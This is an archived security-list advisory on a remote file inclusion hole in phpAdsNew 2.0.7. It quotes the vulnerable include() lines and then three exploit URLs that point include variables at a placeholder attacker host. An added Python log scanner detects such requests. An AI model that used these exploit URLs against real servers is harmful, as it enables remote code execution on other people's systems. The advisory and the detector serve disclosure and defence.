Information Security



Additional information

  Daily summary of errors in Web applications (PHP, ASP, JSP, CGI, Perl)

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From: mr alkomandoz <k3g_(at)_hackermail.com>
Date: January 24, 2007
Subject: phpAdsNew 2.0.7 Remote File Include




-----------------------------------------------

phpAdsNew 2.0.7 Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------

Vuln Code:

include_once ($phpAds_geoPlugin);

.......................

function phpAds_ReportGetPluginInfo($filename)
{
       include ($filename);
       return  ($plugin_info_function());
..........................

include ($phpAds_config['my_footer']);


-----------------------------------------------

3xplo!t:


phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts?

phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?

phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts?



-----------------------------------------------

download:  http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team



###################################################
          AsB-MaT.NeT & D4eG.OrG
###################################################




--
_______________________________________________
Get your free email from http://www.hackermail.com
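
For defenders reviewing web server logs, the following added example (not part of the original advisory and not phpAdsNew project code) flags requests that set one of the three include variables named above to a remote URL. It goes slightly beyond the advisory by also matching https/ftp values and percent-encoded or double-encoded variants. The combined log format, the sample lines and the host example.invalid are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request variables the advisory shows reaching include()/include_once().
INCLUDE_VARS = {"phpads_geoplugin", "filename", "phpads_config[my_footer]"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)

def normalize(name):
    """Lower-case and drop '$', quotes and spaces so spelling variants compare equal."""
    return re.sub(r"[$'\"\s]", "", name).lower()

def rfi_hits(log_line):
    """Return (path, variable, value) for each include variable set to a remote URL."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if normalize(name) in INCLUDE_VARS and REMOTE.match(value):
            hits.append((path, normalize(name), value))
    return hits

def scan(lines):
    """Collect the hits for every line of a log."""
    return [hit for line in lines for hit in rfi_hits(line)]

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2007:10:00:01 +0000] "GET /phpAdsNew-2.0.7/libraries/'
    'lib-remotehost.inc?phpAds_geoPlugin=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.10 - - [24/Jan/2007:10:00:05 +0000] "GET /phpAdsNew-2.0.7/admin/'
    'lib-gui.inc?phpAds_config%5Bmy_footer%5D=http%253A%252F%252Fexample.invalid'
    '%252Fx.txt HTTP/1.1" 200 512',
    # Benign: local file name in an include variable.
    '198.51.100.7 - - [24/Jan/2007:10:01:00 +0000] "GET /phpAdsNew-2.0.7/admin/'
    'report-index.php?filename=report.plugin.php HTTP/1.1" 200 2048',
    # Benign: a URL in a parameter that is not an include variable.
    '198.51.100.7 - - [24/Jan/2007:10:02:00 +0000] "GET /index.php?'
    'ref=http://example.org/ HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for path, var, value in scan(SAMPLE_LOG):
        print(f"possible RFI attempt: {path} {var}={value}")
```

A hit shows only that the request was made; whether the include actually ran depends on the server's PHP settings and installed version.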

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


